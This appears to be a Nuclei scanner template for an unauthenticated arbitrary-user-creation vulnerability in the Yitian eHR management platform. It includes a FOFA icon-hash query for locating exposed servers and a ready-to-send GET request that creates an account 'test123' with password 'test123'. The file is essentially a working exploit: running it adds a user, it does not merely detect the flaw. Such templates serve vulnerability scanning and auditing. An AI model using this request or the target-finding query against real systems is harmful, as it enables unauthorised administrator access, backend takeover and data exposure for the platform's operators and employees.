id: yitianeHR-CreateUser-User-addition

info:
  name: 易天智能eHR管理平台 CreateUser 任意用户添加漏洞
  author: Superhero
  severity: medium
  description: |-
    fofa: icon_hash="314318290" || icon_hash="1727609737"
    易天智能eHR管理平台 /BaseManage/UserAPI/CreateUser 接口存在任意用户添加漏洞，未经身份验证的远程攻击者可以利用此漏洞添加任意管理员用户，导致攻击者可直接管理后台，造成信息泄露，使系统处于极不安全的状态。
  reference:
    - https://blog.csdn.net/m0_60571842/article/details/139998769
  tags: User addition

http:
  - raw:
      - |
        GET /BaseManage/UserAPI/CreateUser?Account=test123&Password=test123&OuterID=778 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '用户新增成功。'
      - type: status
        status: 
          - 200




